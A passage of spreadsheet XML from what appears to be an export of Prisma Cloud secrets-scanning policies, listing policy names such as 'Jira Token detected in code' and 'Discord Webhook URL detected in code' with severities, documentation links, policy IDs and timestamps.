      <c r="Z504" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA504" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB504" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC504" t="inlineStr">
        <is>
          <t>CKV_SECRET_242</t>
        </is>
      </c>
      <c r="AD504" t="b">
        <v>1</v>
      </c>
      <c r="AE504" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF504" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>549933a5-5732-4a3a-acab-bc85a61add76</t>
        </is>
      </c>
      <c r="AI504" t="inlineStr"/>
      <c r="AJ504" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK504" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" t="inlineStr"/>
      <c r="B505" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C505" s="2" t="inlineStr"/>
      <c r="D505" t="inlineStr"/>
      <c r="E505" t="inlineStr"/>
      <c r="F505" t="inlineStr"/>
      <c r="G505" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J505" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K505" t="inlineStr">
        <is>
          <t>Buildkite Agent Token detected in code</t>
        </is>
      </c>
      <c r="L505" t="inlineStr"/>
      <c r="M505" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N505" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O505" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P505" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q505" t="inlineStr"/>
      <c r="R505" t="inlineStr"/>
      <c r="S505" t="inlineStr"/>
      <c r="T505" t="b">
        <v>0</v>
      </c>
      <c r="U505" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V505" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W505" t="inlineStr">
        <is>
          <t>Buildkite Agent Token</t>
        </is>
      </c>
      <c r="X505" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-28</t>
        </is>
      </c>
      <c r="Y505" t="inlineStr"/>
      <c r="Z505" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA505" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB505" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC505" t="inlineStr">
        <is>
          <t>CKV_SECRET_28</t>
        </is>
      </c>
      <c r="AD505" t="b">
        <v>1</v>
      </c>
      <c r="AE505" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF505" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>b440bbd1-34e4-48dd-ae3d-89738d508ff3</t>
        </is>
      </c>
      <c r="AI505" t="inlineStr"/>
      <c r="AJ505" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK505" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" t="inlineStr"/>
      <c r="B506" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C506" s="2" t="inlineStr"/>
      <c r="D506" t="inlineStr"/>
      <c r="E506" t="inlineStr"/>
      <c r="F506" t="inlineStr"/>
      <c r="G506" t="b">
        <v>1</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J506" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K506" t="inlineStr">
        <is>
          <t>Braintree Payments Id detected in code</t>
        </is>
      </c>
      <c r="L506" t="inlineStr"/>
      <c r="M506" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N506" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O506" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P506" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q506" t="inlineStr"/>
      <c r="R506" t="inlineStr"/>
      <c r="S506" t="inlineStr"/>
      <c r="T506" t="b">
        <v>0</v>
      </c>
      <c r="U506" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V506" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W506" t="inlineStr">
        <is>
          <t>Braintree Payments Id</t>
        </is>
      </c>
      <c r="X506" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-85</t>
        </is>
      </c>
      <c r="Y506" t="inlineStr"/>
      <c r="Z506" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA506" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB506" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC506" t="inlineStr">
        <is>
          <t>CKV_SECRET_85</t>
        </is>
      </c>
      <c r="AD506" t="b">
        <v>1</v>
      </c>
      <c r="AE506" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF506" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>b8c06b68-6f26-4dd8-93ea-0fbfb6c0882e</t>
        </is>
      </c>
      <c r="AI506" t="inlineStr"/>
      <c r="AJ506" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK506" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" t="inlineStr"/>
      <c r="B507" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C507" s="2" t="inlineStr"/>
      <c r="D507" t="inlineStr"/>
      <c r="E507" t="inlineStr"/>
      <c r="F507" t="inlineStr"/>
      <c r="G507" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J507" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K507" t="inlineStr">
        <is>
          <t>Eventbrite Oauth2 Keys detected in code</t>
        </is>
      </c>
      <c r="L507" t="inlineStr"/>
      <c r="M507" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N507" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O507" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P507" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q507" t="inlineStr"/>
      <c r="R507" t="inlineStr"/>
      <c r="S507" t="inlineStr"/>
      <c r="T507" t="b">
        <v>0</v>
      </c>
      <c r="U507" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V507" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W507" t="inlineStr">
        <is>
          <t>Eventbrite Oauth2 Keys</t>
        </is>
      </c>
      <c r="X507" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-185</t>
        </is>
      </c>
      <c r="Y507" t="inlineStr"/>
      <c r="Z507" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA507" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB507" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC507" t="inlineStr">
        <is>
          <t>CKV_SECRET_185</t>
        </is>
      </c>
      <c r="AD507" t="b">
        <v>1</v>
      </c>
      <c r="AE507" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF507" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>fb9f73ef-a593-4e55-bac9-b8c75cc88551</t>
        </is>
      </c>
      <c r="AI507" t="inlineStr"/>
      <c r="AJ507" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK507" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" t="inlineStr"/>
      <c r="B508" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C508" s="2" t="inlineStr"/>
      <c r="D508" t="inlineStr"/>
      <c r="E508" t="inlineStr"/>
      <c r="F508" t="inlineStr"/>
      <c r="G508" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J508" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K508" t="inlineStr">
        <is>
          <t>Checkout.com API Key detected in code</t>
        </is>
      </c>
      <c r="L508" t="inlineStr"/>
      <c r="M508" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N508" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O508" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P508" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q508" t="inlineStr"/>
      <c r="R508" t="inlineStr"/>
      <c r="S508" t="inlineStr"/>
      <c r="T508" t="b">
        <v>0</v>
      </c>
      <c r="U508" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V508" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W508" t="inlineStr">
        <is>
          <t>Checkout.com API Key</t>
        </is>
      </c>
      <c r="X508" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-100</t>
        </is>
      </c>
      <c r="Y508" t="inlineStr"/>
      <c r="Z508" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA508" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB508" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC508" t="inlineStr">
        <is>
          <t>CKV_SECRET_100</t>
        </is>
      </c>
      <c r="AD508" t="b">
        <v>1</v>
      </c>
      <c r="AE508" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF508" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>cbf1ea31-d7ee-4176-ac01-d76bdccc2846</t>
        </is>
      </c>
      <c r="AI508" t="inlineStr"/>
      <c r="AJ508" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK508" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" t="inlineStr"/>
      <c r="B509" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C509" s="2" t="inlineStr"/>
      <c r="D509" t="inlineStr"/>
      <c r="E509" t="inlineStr"/>
      <c r="F509" t="inlineStr"/>
      <c r="G509" t="b">
        <v>1</v>
      </c>
      <c r="H5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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J509" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K509" t="inlineStr">
        <is>
          <t>Terraform Cloud API Token detected in code</t>
        </is>
      </c>
      <c r="L509" t="inlineStr"/>
      <c r="M509" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N509" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O509" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P509" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q509" t="inlineStr"/>
      <c r="R509" t="inlineStr"/>
      <c r="S509" t="inlineStr"/>
      <c r="T509" t="b">
        <v>0</v>
      </c>
      <c r="U509" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V509" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W509" t="inlineStr">
        <is>
          <t>Terraform Cloud API Token</t>
        </is>
      </c>
      <c r="X509" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-47</t>
        </is>
      </c>
      <c r="Y509" t="inlineStr"/>
      <c r="Z509" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA509" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB509" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC509" t="inlineStr">
        <is>
          <t>CKV_SECRET_47</t>
        </is>
      </c>
      <c r="AD509" t="b">
        <v>1</v>
      </c>
      <c r="AE509" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF509" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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09" t="inlineStr">
        <is>
          <t>56b81a7c-1927-405e-be9e-c3213af08142</t>
        </is>
      </c>
      <c r="AI509" t="inlineStr"/>
      <c r="AJ509" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK509" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" t="inlineStr"/>
      <c r="B510" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C510" s="2" t="inlineStr"/>
      <c r="D510" t="inlineStr"/>
      <c r="E510" t="inlineStr"/>
      <c r="F510" t="inlineStr"/>
      <c r="G510" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J510" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K510" t="inlineStr">
        <is>
          <t>Base64 High Entropy String detected in code</t>
        </is>
      </c>
      <c r="L510" t="inlineStr"/>
      <c r="M510" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N510" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O510" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P510" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q510" t="inlineStr"/>
      <c r="R510" t="inlineStr"/>
      <c r="S510" t="inlineStr"/>
      <c r="T510" t="b">
        <v>0</v>
      </c>
      <c r="U510" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V510" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W510" t="inlineStr">
        <is>
          <t>Base64 High Entropy Strings</t>
        </is>
      </c>
      <c r="X510" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-6</t>
        </is>
      </c>
      <c r="Y510" t="inlineStr"/>
      <c r="Z510" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA510" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB510" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC510" t="inlineStr">
        <is>
          <t>CKV_SECRET_6</t>
        </is>
      </c>
      <c r="AD510" t="b">
        <v>1</v>
      </c>
      <c r="AE510" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF510" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
          <t>0723a8d8-1bd2-4ccb-afee-ddc3691ced71</t>
        </is>
      </c>
      <c r="AI510" t="inlineStr"/>
      <c r="AJ510" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK510" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" t="inlineStr"/>
      <c r="B511" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C511" s="2" t="inlineStr"/>
      <c r="D511" t="inlineStr"/>
      <c r="E511" t="inlineStr"/>
      <c r="F511" t="inlineStr"/>
      <c r="G511" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J511" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K511" t="inlineStr">
        <is>
          <t>Microsoft Teams webhook detected in code</t>
        </is>
      </c>
      <c r="L511" t="inlineStr"/>
      <c r="M511" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N511" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O511" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P511" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q511" t="inlineStr"/>
      <c r="R511" t="inlineStr"/>
      <c r="S511" t="inlineStr"/>
      <c r="T511" t="b">
        <v>0</v>
      </c>
      <c r="U511" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V511" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W511" t="inlineStr">
        <is>
          <t>Microsoft Teams webhook</t>
        </is>
      </c>
      <c r="X511" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-111</t>
        </is>
      </c>
      <c r="Y511" t="inlineStr"/>
      <c r="Z511" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA511" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB511" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC511" t="inlineStr">
        <is>
          <t>CKV_SECRET_111</t>
        </is>
      </c>
      <c r="AD511" t="b">
        <v>1</v>
      </c>
      <c r="AE511" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF511" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>edd22ab2-abb6-4db7-99cf-12c75892d5b0</t>
        </is>
      </c>
      <c r="AI511" t="inlineStr"/>
      <c r="AJ511" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK511" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" t="inlineStr"/>
      <c r="B512" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C512" s="2" t="inlineStr"/>
      <c r="D512" t="inlineStr"/>
      <c r="E512" t="inlineStr"/>
      <c r="F512" t="inlineStr"/>
      <c r="G512" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J512" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K512" t="inlineStr">
        <is>
          <t>Fastly Personal Token detected in code</t>
        </is>
      </c>
      <c r="L512" t="inlineStr"/>
      <c r="M512" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N512" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O512" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P512" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q512" t="inlineStr"/>
      <c r="R512" t="inlineStr"/>
      <c r="S512" t="inlineStr"/>
      <c r="T512" t="b">
        <v>0</v>
      </c>
      <c r="U512" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V512" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W512" t="inlineStr">
        <is>
          <t>Fastly Personal Token</t>
        </is>
      </c>
      <c r="X512" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-41</t>
        </is>
      </c>
      <c r="Y512" t="inlineStr"/>
      <c r="Z512" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA512" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB512" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC512" t="inlineStr">
        <is>
          <t>CKV_SECRET_41</t>
        </is>
      </c>
      <c r="AD512" t="b">
        <v>1</v>
      </c>
      <c r="AE512" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF512" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>96ca6d09-8c3e-47f2-b5d7-f5c2181fb387</t>
        </is>
      </c>
      <c r="AI512" t="inlineStr"/>
      <c r="AJ512" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK512" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" t="inlineStr"/>
      <c r="B513" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C513" s="2" t="inlineStr"/>
      <c r="D513" t="inlineStr"/>
      <c r="E513" t="inlineStr"/>
      <c r="F513" t="inlineStr"/>
      <c r="G513" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J513" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K513" t="inlineStr">
        <is>
          <t>PubNub Subscription Key detected in code</t>
        </is>
      </c>
      <c r="L513" t="inlineStr"/>
      <c r="M513" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N513" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O513" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P513" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q513" t="inlineStr"/>
      <c r="R513" t="inlineStr"/>
      <c r="S513" t="inlineStr"/>
      <c r="T513" t="b">
        <v>0</v>
      </c>
      <c r="U513" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V513" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W513" t="inlineStr">
        <is>
          <t>PubNub Subscription Key</t>
        </is>
      </c>
      <c r="X513" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-92</t>
        </is>
      </c>
      <c r="Y513" t="inlineStr"/>
      <c r="Z513" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA513" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB513" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC513" t="inlineStr">
        <is>
          <t>CKV_SECRET_92</t>
        </is>
      </c>
      <c r="AD513" t="b">
        <v>1</v>
      </c>
      <c r="AE513" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF513" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>c0585ff0-2356-4e48-bcde-ac579804cf2f</t>
        </is>
      </c>
      <c r="AI513" t="inlineStr"/>
      <c r="AJ513" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK513" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" t="inlineStr"/>
      <c r="B514" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C514" s="2" t="inlineStr"/>
      <c r="D514" t="inlineStr"/>
      <c r="E514" t="inlineStr"/>
      <c r="F514" t="inlineStr"/>
      <c r="G514" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J514" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K514" t="inlineStr">
        <is>
          <t>Discord Webhook URL detected in code</t>
        </is>
      </c>
      <c r="L514" t="inlineStr"/>
      <c r="M514" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N514" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O514" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P514" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q514" t="inlineStr"/>
      <c r="R514" t="inlineStr"/>
      <c r="S514" t="inlineStr"/>
      <c r="T514" t="b">
        <v>0</v>
      </c>
      <c r="U514" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V514" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W514" t="inlineStr">
        <is>
          <t>Discord Webhook URL</t>
        </is>
      </c>
      <c r="X514" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-120</t>
        </is>
      </c>
      <c r="Y514" t="inlineStr"/>
      <c r="Z514" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA514" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB514" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC514" t="inlineStr">
        <is>
          <t>CKV_SECRET_120</t>
        </is>
      </c>
      <c r="AD514" t="b">
        <v>1</v>
      </c>
      <c r="AE514" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF514" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>12b005b4-76e9-43bf-b3d8-42a3673beb56</t>
        </is>
      </c>
      <c r="AI514" t="inlineStr"/>
      <c r="AJ514" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK514" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" t="inlineStr"/>
      <c r="B515" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C515" s="2" t="inlineStr"/>
      <c r="D515" t="inlineStr"/>
      <c r="E515" t="inlineStr"/>
      <c r="F515" t="inlineStr"/>
      <c r="G515" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J515" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K515" t="inlineStr">
        <is>
          <t>Jira Token detected in code</t>
        </is>
      </c>
      <c r="L515" t="inlineStr"/>
      <c r="M515" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N515" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O515" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P515" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
